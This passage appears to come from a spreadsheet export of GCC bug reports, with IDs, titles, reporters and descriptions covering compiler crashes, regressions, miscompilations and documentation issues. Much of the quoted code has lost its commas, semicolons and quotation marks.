        ../../gcc/gcc/cp/parser.c:10869
0x6da85a cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4014
0x6da85a c_parse_file()
        ../../gcc/gcc/cp/parser.c:31595
0x7f9f53 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1060
Please submit a full bug report [etc.]
Adam you might want to have a look at that one too.</t>
  </si>
  <si>
    <t>GCC-16647</t>
  </si>
  <si>
    <t>IntBuffer routine failure</t>
  </si>
  <si>
    <t>I hope this hasn't been reported before.  Bugzilla did not report anything 
with the word asIntBuffer in it. 
I am trying to do some buffer calls.  A simple call to asIntBuffer() fails 
with: 
Exception in thread main java.lang.IllegalArgumentException 
   at java.nio.Buffer.limit(int) (/usr/lib/libgcj.so.4.0.0) 
   at gnu.java.nio.ByteBufferImpl.asIntBuffer() (/usr/lib/libgcj.so.4.0.0) 
   at example.main(java.lang.String[]) (Unknown Source) 
Here is the sample routine that produced this error: 
import java.nio.ByteBuffer 
import java.nio.IntBuffer 
public class example { 
    public static void main(String args[]) { 
        ByteBuffer bb = ByteBuffer.allocate(4) 
        IntBuffer ib = bb.asIntBuffer() 
    } 
} 
here is the output of gcj -dumpversion: 
3.3.1 
I am running on a Mandrake Linux 9.2 system. 
AMD Athlon 1.2 Ghz CPU 
256 MB of crucial ram. 
Any more information required please contact me. 
Thanks for your attention to this. 
Tom Green</t>
  </si>
  <si>
    <t>GCC-10546</t>
  </si>
  <si>
    <t>GCC 3.3 Ada tasking not working on Red Hat Linux 9</t>
  </si>
  <si>
    <t>Due to change in the size of pthread_cond_t Ada tasking
does not work with recent Linux releases.
Release:
3.3
Environment:
Red Hat Linux 9</t>
  </si>
  <si>
    <t>guerby</t>
  </si>
  <si>
    <t>GCC-48302</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in reposition_prologue_and_epilogue_notes (function.c:5662) with -fcrossjumping -fselective-scheduling2</t>
  </si>
  <si>
    <t>Created attachment 23781
reduced testcase
Command line:
$ gcc -O -fcrossjumping -fgcse -fschedule-insns2 -fsel-sched-pipelining -fsel-sched-pipelining-outer-loops -fselective-scheduling2 --param lim-expensive=320 --param min-crossjump-insns=1 testcase.C
or
$ gcc -O2 -fsel-sched-pipelining -fsel-sched-pipelining-outer-loops -fselective-scheduling2 -fno-tree-copy-prop -fno-tree-vrp --param min-crossjump-insns=1 testcase.C
Compiler output:
$ gcc -O2 -fsel-sched-pipelining -fsel-sched-pipelining-outer-loops -fselective-scheduling2 -fno-tree-copy-prop -fno-tree-vrp --param min-crossjump-insns=1 testcase.C
==18470== Invalid read of size 2
==18470==    at 0x8731AB: reposition_prologue_and_epilogue_notes (function.c:5662)
==18470==    by 0x9BB9CC: sched_rgn_finish (sched-rgn.c:3074)
==18470==    by 0x9F1359: run_selective_scheduling (sel-sched.c:7645)
==18470==    by 0x9BF695: rest_of_handle_sched2 (sched-rgn.c:3523)
==18470==    by 0x937AA5: execute_one_pass (passes.c:1555)
==18470==    by 0x937D94: execute_pass_list (passes.c:1610)
==18470==    by 0x937DA6: execute_pass_list (passes.c:1611)
==18470==    by 0x937DA6: execute_pass_list (passes.c:1611)
==18470==    by 0xA79D95: tree_rest_of_compilation (tree-optimize.c:422)
==18470==    by 0xC44D11: cgraph_expand_function (cgraphunit.c:1576)
==18470==    by 0xC473E9: cgraph_optimize (cgraphunit.c:1635)
==18470==    by 0xC47969: cgraph_finalize_compilation_unit (cgraphunit.c:1096)
==18470==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==18470== 
testcase.C: In function 'void foo()':
testcase.C:18:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r171573 - crash
4.6 r170955 - crash
4.5 r170955 - crash
4.4 r170955 - crash (the -O1 version)</t>
  </si>
  <si>
    <t>GCC-46326</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 166382 failed to bootstrap</t>
  </si>
  <si>
    <t>Revision 166382:
http://gcc.gnu.org/ml/gcc-cvs/2010-11/msg00269.html
failed to bootstrap on x86. I got
../../src-trunk/gcc/config/i386/i386.c: In function 'ix86_delegitimize_address':
../../src-trunk/gcc/config/i386/i386.c:13017:8: error: 'or' of unmatched not-equal tests is always 1 [-Werror]
cc1: all warnings being treated as errors
make[6]: *** [i386.o] Error 1
make[6]: *** Waiting for unfinished jobs....
Code in question is
      if (GET_CODE (x) != CONST 
          || GET_CODE (XEXP (x 0)) != UNSPEC
          || XINT (XEXP (x 0) 1) != UNSPEC_GOTPCREL
          || XINT (XEXP (x 0) 1) != UNSPEC_PCREL
          || !MEM_P (orig_x))
        return ix86_delegitimize_tls_address (orig_x)
It doesn't make any senses to me.</t>
  </si>
  <si>
    <t>GCC-65703</t>
  </si>
  <si>
    <t>-fdefer-pop documentation is confusing</t>
  </si>
  <si>
    <t>-fdefer-pop is listed as activated by the -O option but not anywhere
else in the documentation (doc/invoke.texi specifically).
However there is actually code to support this option specifically
in gcc/common.opt and gcc/calls.c.</t>
  </si>
  <si>
    <t>GCC-79837</t>
  </si>
  <si>
    <t>incomplete diagnostic in c-parser: expected + * - &amp; ^ | &amp;&amp; || min or identifier</t>
  </si>
  <si>
    <t>c_parser_error (parser
                expected % % % % 
                % % %&lt;
There is a  max missing after min.</t>
  </si>
  <si>
    <t>GCC-42758</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE on assert() in function with complex(?) template argument</t>
  </si>
  <si>
    <t>The following code compiles fine with g++-4.4 and causes g++-4.5 to segfault.
Removing the assert() or removing the int_less_than parameter no longer lead
to a segfault.
% g++-4.5 --version
g++-4.5 (Debian 4.5-20091226-1) 4.5.0 20091226 (experimental) [trunk revision 155473]
Copyright (C) 2009 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
% cat bug.cc
#include 
#include 
namespace spot
{
  struct int_less_than
  {
    bool operator()(int int) const { return 0 }
  }
  int f(const std::set&amp;)
  {
    assert(0)
    return 1
  }
}
% g++-4.4 -c bug.cc    # 4.4 runs OK
% g++-4.5 -c bug.cc
g++-4.5: Internal error: Segmentation fault (program cc1plus)
Please submit a full bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-43062</t>
  </si>
  <si>
    <t>NAMELIST attribute conflicts with ALLOCATABLE attribute</t>
  </si>
  <si>
    <t>Report :
========
Using built-in specs.
Target: powerpc-apple-darwin9.8.0
Configured with: ./configure
Thread model: posix
gcc version 4.4.3 (GCC) 
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.5.8' '-v' '-save-temps' '-c'
 /usr/local/libexec/gcc/powerpc-apple-darwin9.8.0/4.4.3/f951 prog.f90 -fPIC -quiet -dumpbase prog.f90 -mmacosx-version-min=10.5.8 -auxbase prog -version -fintrinsic-modules-path /usr/local/lib/gcc/powerpc-apple-darwin9.8.0/4.4.3/finclude -o prog.s
GNU Fortran (GCC) version 4.4.3 (powerpc-apple-darwin9.8.0)
	compiled by GNU C version 4.4.3 GMP version 5.0.1 MPFR version 2.4.2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
prog.f90:3.17:
NAMELIST/TOTO/TAB
                 1
Error: NAMELIST attribute conflicts with ALLOCATABLE attribute in 'tab' at (1)
========
Test file :
========
PROGRAM MAIN
REAL DIMENSION(:) ALLOCATABLE :: TAB
NAMELIST/TOTO/TAB
END PROGRAM MAIN
========
It should work with F2003 new features.</t>
  </si>
  <si>
    <t>zazzou</t>
  </si>
  <si>
    <t>GCC-78870</t>
  </si>
  <si>
    <t>Support std::filesystem on Windows</t>
  </si>
  <si>
    <t>Currently std::experimental::filesystem / stdc++fs is missing in MSYS2 / MinGW (tested with GCC 6.2.0).</t>
  </si>
  <si>
    <t>jhasse</t>
  </si>
  <si>
    <t>GCC-41385</t>
  </si>
  <si>
    <t>[4.5 regression] Many regressions on trunk</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 151771 gave
FAIL: gcc.dg/tls/alias-1.c (test for excess errors)
FAIL: gcc.dg/tls/diag-1.c (test for excess errors)
FAIL: gcc.dg/tls/diag-2.c (test for excess errors)
FAIL: gcc.dg/tls/diag-3.c (test for excess errors)
FAIL: gcc.dg/tls/diag-4.c (test for excess errors)
FAIL: gcc.dg/tls/diag-5.c (test for excess errors)
FAIL: gcc.dg/tls/diag-6.c (test for excess errors)
FAIL: gcc.dg/tls/init-1.c (test for excess errors)
FAIL: gcc.dg/tls/opt-11.c (test for excess errors)
FAIL: gcc.dg/tls/section-1.c (test for excess errors)
FAIL: gcc.dg/tls/trivial.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/20030920-1.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/alias-16.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/ifc-3.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/ivopts-1.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/pr15791-1.c (test for excess errors)
FAIL: gcc.dg/tree-ssa/pr20739.c (test for excess errors)
FAIL: gcc.dg/weak/weak-6.c pointer conversion (test for errors line 5)
FAIL: gcc.dg/weak/weak-6.c (test for excess errors)
FAIL: gcc.dg/weak/weak-7.c pointer conversion (test for errors line 5)
FAIL: gcc.dg/weak/weak-7.c (test for excess errors)
FAIL: gcc.dg/weak/weak-8.c (test for excess errors)
Revision 151754 is OK.</t>
  </si>
  <si>
    <t>GCC-1969</t>
  </si>
  <si>
    <t>private delete fails mysteriously</t>
  </si>
  <si>
    <t>I found this on gcc-2.95.2 but it's still present on the
CodeSourcery version.
Release:
gcc version 2.97 20010212 (experimental)
How-To-Repeat:
cat &gt; foo.cc &lt;&lt; EOF
class A {
    private:
        void operator delete(void*)
    public:
        virtual ~A() { }
}
class B : public A {
    public:
        virtual ~B() { }
}
EOF
gcc -c foo.cc</t>
  </si>
  <si>
    <t>GCC-62308</t>
  </si>
  <si>
    <t>A bug with aarch64 big-endian</t>
  </si>
  <si>
    <t>Hi when I compiled test.c with aarch64-none-elf-gcc -mbig-endian -S it reported the following error:
   test.c:In function 'checkx2823':
   test.c:3:25:internal compiler error:Segmentation fault 
   void checkx2823(struct S2823 args){}
test.c:
   typedef int __attribute__((vector_size(16))) v4si
   struct S2823 {v4si aint b[0]}
   void checkx2823 (struct S2823 args){}
With the option of -mlittle-endian it would not have this error.And the error would interrupt cc1 in the rtl-optimization reloadcan someone help me find the reason ?
  Thankyou!
by yimingliang</t>
  </si>
  <si>
    <t>yml6087582</t>
  </si>
  <si>
    <t>GCC-17732</t>
  </si>
  <si>
    <t>Legal program rejected RM 4.1.3(7)</t>
  </si>
  <si>
    <t>This is Debian bug #274077 with a different title because GCC 3.4.2 and GNAT
3.15p give different symptoms.
with text_io
procedure Test_120 is
   protected type pt1 is
      function f3 return integer   -- overloaded
      function f4 return integer   -- not overloaded
   end pt1
   protected body pt1 is
      function f3 return integer is begin return 1 end
      function f4 return integer is begin return 2 end
   end pt1
   protected type pt2 is
      function f3 return float
   end pt2
   protected body pt2 is
      function f3 return float is begin return 0.0 end
   end pt2
   type pt1_acc is access all pt1
   type pt2_acc is access all pt2
   x1: aliased pt1
   x2: aliased pt2
   function f1 return pt1_acc is begin return x1'access end
   function f1 return pt2_acc is begin return x2'access end
begin
   text_io.put_line(integer'image(f1.all.f4))
   text_io.put_line(integer'image(f1.f4))
   text_io.put_line(integer'image(f1.all.f3))
   text_io.put_line(integer'image(f1.f3))  -- should allow implicit .all
end Test_120
GCC 3.4.2 gives:
test_120.adb:34:35: access type required in prefix of explicit dereference
gnatmake: test_120.adb compilation error
which is incorrect the three lines above demonstrate correct behaviour.
GNAT 3.15p gives a bug box:
+===========================GNAT BUG DETECTED==============================+
| 3.15p  (20020523) (i486-pc-linux-gnu) Program_Error sem_type.adb:1348 explicit
raise|
| Error detected at test_120.adb:34:37                                     |
-- 
Ludovic Brenta.</t>
  </si>
  <si>
    <t>GCC-8952</t>
  </si>
  <si>
    <t>failure to optimize away trivial C++ object creation</t>
  </si>
  <si>
    <t>g++ 3.2.1 x86 fails to perform some easy optimizations.  Here I look
at class literal constant folding.  This might be an important part
of the remaining abstraction penalty.
Consider this most simple and optimizer-friendly class with 2 data members:
    class Complex
    {
    private:
      const int real_
      const int imag_
    public:
      inline Complex (int real int imag) : real_ (real) imag_ (imag) {}
      inline int Real() const { return real_ }
      inline int Imag() const { return imag_ }
      inline friend Complex operator+ (Complex z1 Complex z2)
      { return Complex (z1.real_ + z2.real_ z1.imag_ + z2.imag_) }
    }
If we now use Complex Literals like Complex(34) the compiler
should be able to do the obvious optimizations like constant-folding
just as with builtin types.
Now let's look at the x86 assembly code for two functions:
    Complex foo () { return Complex(911) }
==&gt;  generates obvious optimal code:
	movl	4(%esp) %eax
	movl	$9 (%eax)
	movl	$11 4(%eax)
	ret	$4
On the other hand
    Complex bar () { return Complex(12) + Complex(89) }
==&gt; generates suboptimal code:
	subl	$20 %esp
	movl	24(%esp) %eax
	movl	$1 8(%esp)
	movl	$8 (%esp)
	movl	$2 12(%esp)
	movl	$9 4(%esp)
	movl	$9 (%eax)
	movl	$11 4(%eax)
	addl	$20 %esp
	ret	$4
The two functions should generate identical code.  There seem to be
actually too simple optimizer bugs here:
- The addition operand objects above are created but never used
  (since the result is computed at compile time).  So the code to
  generate them can simply be discarded (the constructors have no side
  effects).
- There seems to be no need to adjust %esp since this is a leaf function.
Note that these bugs are sufficiently simple that I might be able to
write an easy optimizer pass as a postprocessor on the .s files.
But the gcc maintainers should fix the deeper problems.  Stores to
never-used stack slots should be easy to optimize away.
Could this be part of the reason Intel C++ dramatically outperforms
g++ on Scott Ladd's Complex benchmark?
The analogous problem does NOT appear to occur with classes containing
only one data member.
Details: g++ 3.2.1 on Linux x86  g++ -Wall -S -O3 -fomit-frame-pointer
Disclaimer:  The only assembly code I've ever written was IBM System/370.
Release:
gcc-3.2.1
Environment:
x86 Linux
How-To-Repeat:
Compile the following on x86 Linux using: g++ -S -O3
examine the .s file generated.
class Complex
{
private:
  const int real_
  const int imag_
public:
  inline Complex (int real int imag) : real_ (real) imag_ (imag) {}
  inline int Real() const { return real_ }
  inline int Imag() const { return imag_ }
  inline friend Complex operator+ (Complex z1 Complex z2)
  { return Complex (z1.real_ + z2.real_ z1.imag_ + z2.imag_) }
}
Complex foo () { return Complex(911) }
Complex bar () { return Complex(12) + Complex(89) }</t>
  </si>
  <si>
    <t>GCC-21296</t>
  </si>
  <si>
    <t>[3.3 Regression] Missed warning</t>
  </si>
  <si>
    <t>-Wall warns about most statements with no effect.  However it doesn't warn about
volatile int v
void foo(void)
{
}</t>
  </si>
  <si>
    <t>GCC-8795</t>
  </si>
  <si>
    <t>[PPC] Altivec related bugs concerning gcc 3.3 and mainline</t>
  </si>
  <si>
    <t>1) The compiler crashes with segmentation fault when compiling simple Altivec and C++ code. This bug is present in 3.2(release) 3.2.1(release) 3.3(latest form gcc cvs 1Dec2002). The example is in test.cpp
2) This bug applies only to g++(gcc -xc++) only for the 3.3 (latest source from CVS) current stage. When initializing vector values the compiler will report:
error: brace-enclosed initializer used to initialize 'vector ...'
the example test.cpp illustartes this problem also.
Note that the second bug applies only to g++3.3
Release:
3.2.1(1 bug) 3.3(2 bugs)
Environment:
powerpc-yellowdog-linux-gnu(yellowdog 2.3) binutils 2.13
How-To-Repeat:
g++ -maltivec -static -otest test.cpp
or
gcc -xc++ -maltivec -static -otest test.cpp</t>
  </si>
  <si>
    <t>kostadindabov</t>
  </si>
  <si>
    <t>GCC-51274</t>
  </si>
  <si>
    <t>Starting with GCC 4.5 powerpc generated different code for x != 0.</t>
  </si>
  <si>
    <t>In doing some investigation for optimizations of comparisons for power7 I noticed that starting with GCC 4.5 the compiler no longer generates the code it used to for setting x = (y != 0).  In the rs6000.md file these optimizations start with the insn ne0si.
In the 4.4 time frame for -m32 (and for -m32 -mpowerpc64 which is PR 36557) gcc would generate:
        addic 93-1
        subfe 093
However it wouldn't generate this code for -m64.  Starting with 4.5 it generates the code for !(x == 0) or:
        cntlzw 33
        srwi 335
        xori 331
We should either remove the insns in rs6000.md that no longer are matching or fix them so they do match.  I suspect that the longer code sequence is actually faster on the newer processors since you don't need to track the carry between the two insns.</t>
  </si>
  <si>
    <t>GCC-38727</t>
  </si>
  <si>
    <t>gcc  4.4.0 20090104 - make -i check autogen fixinclude test FAILURES</t>
  </si>
  <si>
    <t>The autogen program (Ver. 5.7) finds fixinclude test failures.
# /usr/local/bin/gcc -v
Using built-in specs.
Target: i386-pc-solaris2.11
Configured with: ../gcc_trunk/configure --enable-languages=adacc++fortranjavaobjcobj-c++ --enable-shared --disable-static --enable-decimal-float --enable-nls --without-system-libunwind --with-gnu-as --with-as=/usr/local/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld
Thread model: posix
gcc version 4.4.0 20090104 (experimental) (GCC) 
# make -i check
gmake[1]: Entering directory `/usr/share/src/gcc_build'
gmake[2]: Entering directory `/usr/share/src/gcc_build/fixincludes'
autogen -T ../../gcc_trunk/fixincludes/check.tpl ../../gcc_trunk/fixincludes/inclhack.def
/bin/sh ./check.sh ../../gcc_trunk/fixincludes/tests/base
Fixed:  testing.h
Fixed:  testing.h
Fixed:  */sys/getppdp.h
Fixed:  AvailabilityMacros.h
Fixed:  X11/ShellP.h
...
Fixed:  tinfo.h
Fixed:  types/vxTypesBase.h
Fixed:  unistd.h
Fixed:  wchar.h
*/sys/getppdp.h /usr/share/src/gcc_trunk/fixincludes/tests/base/ia64/sys/getppdp.h differ: char 98 line 5
*** */sys/getppdp.h	Mon Jan  5 05:03:21 2009
--- /usr/share/src/gcc_trunk/fixincludes/tests/base/ia64/sys/getppdp.h	Thu Jan  1 14:09:22 2009
***************
*** 28 ****
      It has been auto-edited by fixincludes from:
! 	fixinc/tests/inc/*/sys/getppdp.h
      This had to be done to correct non-standard usages in the
      original manufacturer supplied header file.  */
--- 28 ----
      It has been auto-edited by fixincludes from:
! 	fixinc/tests/inc/ia64/sys/getppdp.h
      This had to be done to correct non-standard usages in the
      original manufacturer supplied header file.  */
Newly fixed header:  locale.h
Newly fixed header:  stdarg.h
Missing header fix:  ia64/sys/getppdp.h
There were fixinclude test FAILURES
gmake[2]: [check] Error 1 (ignored)
gmake[2]: Leaving directory `/usr/share/src/gcc_build/fixincludes'
gmake[2]: Entering directory `/usr/share/src/gcc_build/gcc'
Making a new config file...
echo set tmpdir /usr/share/src/gcc_build/gcc/testsuite &gt;&gt; ./tmp0
gmake[3]: Entering directory `/usr/share/src/gcc_build/gcc'
# slocate sys/getppdp.h
/usr/share/src/gcc_trunk/fixincludes/tests/base/ia64/sys/getppdp.h
/usr/share/src/gcc_build/fixincludes/tests/res/*/sys/getppdp.h
/usr/share/src/gcc_build/fixincludes/tests/inc/*/sys/getppdp.h
I don't know why the scripts created the * directories in: 
/usr/share/src/gcc_build/fixincludes/tests/???/x .
# ls -l /usr/share/src/gcc_build/fixincludes/tests/res/ | head -3
total 174
drwxr-xr-x   3 root     root           3 Jan  5 05:03 *
drwxr-xr-x   2 root     root           4 Jan  5 05:03 ansi
There must be a better choice for the directory name other than * ?
Rob</t>
  </si>
  <si>
    <t>GCC-42618</t>
  </si>
  <si>
    <t>Problem reading discriminated values from streams</t>
  </si>
  <si>
    <t>The test program writes 3 values of a discriminated record to a stream ('Output) and then reads them back ('Input).
It then uses 'Write and 'Read for a single value.
No problem arises with 32-bit compilations or with 64-bit compilations with -O0.
With -O1 or -O2 the values read back are incorrect (in some cases).
Same behaviour reported on Debian:
gnat-4.4_4.4.2-5_amd64.deb: 
 -O0 OK 
 -O1 bug 
 -O2 bug 
gnat-4.4_4.4.2-5_i386.deb: 
 -O0 OK 
 -O1 OK 
 -O2 OK 
That version of GNAT was taken from the FSF's gcc-4_4-branch on 
2009-12-28 so is very recent.
The correct output is
 1234
'z'
 4.32100E-01
 4.32100E-01
The incorrect output is
 1234
NUL
 0.00000E+00
 0.00000E+00</t>
  </si>
  <si>
    <t>GCC-79293</t>
  </si>
  <si>
    <t>[7 regression] gcc.dg/tree-ssa/builtin-sprintf.c fails starting with r244953</t>
  </si>
  <si>
    <t>At least I think it is 244753.  There were a bunch of updates for that revision which left the compiler unable to build but after those were cleared up builtin-sprintf was failing.
pawn /home/seurer/gcc/build/gcc-trunk/gcc/xgcc -B/home/seurer/gcc/build/gcc-trunk/gcc/ /home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c -fno-diagnostics-show-caret -fdiagnostics-color=never -ansi -pedantic-errors -O2 -Wall -Wno-pedantic -fprintf-return-value -lm -o ./builtin-sprintf.exe
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c: In function 'test_d_i':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:307:20: warning: '0' flag ignored with precision and '%i' gnu_printf format [-Wformat=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:128:44: note: in definition of macro 'RNG'
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c: In function 'test_percent':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:791:18: warning: too many arguments for format [-Wformat-extra-args]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:114:44: note: in definition of macro 'EQL'
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:792:18: warning: too many arguments for format [-Wformat-extra-args]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:114:44: note: in definition of macro 'EQL'
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:793:18: warning: too many arguments for format [-Wformat-extra-args]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:114:44: note: in definition of macro 'EQL'
/tmp/ccg3ni4S.o: In function `test_g_long_double':
builtin-sprintf.c:(.text+0x5600): undefined reference to `failure_on_line_724'
collect2: error: ld returned 1 exit status
compiler exited with status 1
output is:
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c: In function 'test_d_i':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:307:20: warning: '0' flag ignored with precision and '%i' gnu_printf format [-Wformat=]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:128:44: note: in definition of macro 'RNG'
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c: In function 'test_percent':
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:791:18: warning: too many arguments for format [-Wformat-extra-args]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:114:44: note: in definition of macro 'EQL'
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:792:18: warning: too many arguments for format [-Wformat-extra-args]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:114:44: note: in definition of macro 'EQL'
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:793:18: warning: too many arguments for format [-Wformat-extra-args]
/home/seurer/gcc/gcc-trunk/gcc/testsuite/gcc.dg/tree-ssa/builtin-sprintf.c:114:44: note: in definition of macro 'EQL'
/tmp/ccg3ni4S.o: In function `test_g_long_double':
builtin-sprintf.c:(.text+0x5600): undefined reference to `failure_on_line_724'
collect2: error: ld returned 1 exit status
PASS: gcc.dg/tree-ssa/builtin-sprintf.c  (test for warnings line 307)
PASS: gcc.dg/tree-ssa/builtin-sprintf.c  (test for warnings line 791)
PASS: gcc.dg/tree-ssa/builtin-sprintf.c  (test for warnings line 792)
PASS: gcc.dg/tree-ssa/builtin-sprintf.c  (test for warnings line 793)
FAIL: gcc.dg/tree-ssa/builtin-sprintf.c (test for excess errors)
Excess errors:
builtin-sprintf.c:(.text+0x5600): undefined reference to `failure_on_line_724'
UNRESOLVED: gcc.dg/tree-ssa/builtin-sprintf.c compilation failed to produce executable</t>
  </si>
  <si>
    <t>GCC-33376</t>
  </si>
  <si>
    <t>[4.3 regression] USE with renaming assembler message: symbol already defined</t>
  </si>
  <si>
    <t>Hi
the following program fails to compile with rev.128283
but used to work just a few days ago:
% cat gfcbug70.f90
module foo
  implicit none
  public chk
  type mytype
    character(len=4) :: str
  end type mytype
  type (mytype) parameter :: chk (1) = (/ mytype (abcd) /)
end module foo
module gfcbug70
  use foo only: chk_ =&gt; chk
  implicit none
contains
  subroutine chk (i)
    integer intent(in) :: i
    print * chk_(i)% str
  end subroutine chk
end module gfcbug70
I get:
/tmp/ccnnONGa.s: Assembler messages:
/tmp/ccnnONGa.s:19: Error: symbol `__gfcbug70_MOD_chk' is already defined</t>
  </si>
  <si>
    <t>GCC-33173</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in set_uids_in_ptset at tree-ssa-structalias.c:4704</t>
  </si>
  <si>
    <t>I see the following error with trunk from 20070820:
(sid)28233:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -O -c tor-test.c
tor-test.c: In function 'test_dir_format':
tor-test.c:16: internal compiler error: in set_uids_in_ptset at tree-ssa-structalias.c:4704
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-40159</t>
  </si>
  <si>
    <t>[4.5 regression] make all ignores build failures</t>
  </si>
  <si>
    <t>Since r147415 all failures from recursive make calls are ignored and make all always exits successfully.</t>
  </si>
  <si>
    <t>GCC-3874</t>
  </si>
  <si>
    <t>gcc 3.0 breaks Mercury</t>
  </si>
  <si>
    <t>gcc 3.0 crashes when compiling the C files generated by the Mercury compiler.
The problem seems to be related to taking the address of an unreachable label.
The problem still occurs in the current snapshots.
Release:
gcc-3.0
Environment:
Debian GNU/Linux (x86)
How-To-Repeat:
gcc -O bug.c</t>
  </si>
  <si>
    <t>GCC-49822</t>
  </si>
  <si>
    <t>[4.7 regression] Segfault in remove_prop_source_from_use</t>
  </si>
  <si>
    <t>Created attachment 24815
testcase
Attached testcase segfaults GCC for arm-eabi when compiled with
cc1 -marm -mcpu=arm7tdmi -Os -fno-short-enums
This was caused by:
2011-07-21  Richard Guenther  
    	* tree-ssa-forwprop.c (combine_conversions): Return whether
    	we have to run cfg-cleanup.  Properly remove dead stmts.
    	(ssa_forward_propagate_and_combine): Adjust.</t>
  </si>
  <si>
    <t>GCC-57093</t>
  </si>
  <si>
    <t>Seg fault on internal output to a character scalar coarray</t>
  </si>
  <si>
    <t>$ cat co_hello.f90 
program main 
 ! len=25 seg faults 
  character(len=25) allocatable :: greeting[:] 
  allocate(greeting[*])
  write(greeting(a)) z
end 
$ gfortran -fcoarray=single co_hello.f90 
$ ./a.out
a.out(35951) malloc: *** error for object 0x7fc5ba404c20: pointer being freed was not allocated
*** set a breakpoint in malloc_error_break to debug
Program received signal SIGABRT: Process abort signal.
Backtrace for this error:
#0  0x1055d2e62
#1  0x1055d362e
#2  0x7fff90ae6949
Abort trap: 6
$ gfortran --version
GNU Fortran (MacPorts gcc49 4.9-20130414_0) 4.9.0 20130414 (experimental)</t>
  </si>
  <si>
    <t>GCC-9762</t>
  </si>
  <si>
    <t>Address of 'char' is incorrect.</t>
  </si>
  <si>
    <t xml:space="preserve">	In the example below '&amp;a' is the address of a local copy of 'a' not of 'a'.
	if the type of 'a' is changed to int it works as expected.
Release:
3.2.3 20030210 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux stag 2.4.19-686 #1 Thu Aug 8 21:30:09 EST 2002 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protopascalobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux
How-To-Repeat:
#define TA char
#define TB int
#define TC int
void foobar(TA a TB b TC c)
int main()
{
	foobar(123)
	return 0
}
void foobar(TA a TB b TC c)
{
	printf(a == %i  claims %x\n a 
	printf(a == %i  really %x\n (
	printf(b == %i  %x\n b 
	printf(c == %i  %x\n c 
}</t>
  </si>
  <si>
    <t>GCC-46842</t>
  </si>
  <si>
    <t>[4.6 Regression] wrong results with MATMUL(... TRANSPOSE (func ())) -- 465.tonto test run miscompares</t>
  </si>
  <si>
    <t>Tests are performed based 4.6 trunk @ 167317 on a linux64 system. 456.tonto test run miscompares @ any options. 
train and ref runs are fine.
LINK: gfortran   -O0  -DSPEC_CPU_LP64                   -o options
C: LD=gfortran
O: FOPTIMIZE=-O0
P: PORTABILITY=-DSPEC_CPU_LP64
C: LDOUT=-o options
Build successes: 465.tonto(base)
Setting Up Run Directories
  Setting up 465.tonto test base cfang default: existing (run_base_test_cfang.0000)
Running Benchmarks
  Running 465.tonto test base cfang default
/home/chfang/cpu2006/bin/specinvoke -d /home/chfang/cpu2006/benchspec/CPU2006/465.tonto/run/run_base_test_cfang.0000 -e speccmds.err -o speccmds.stdout -f speccmds.cmd -r -C
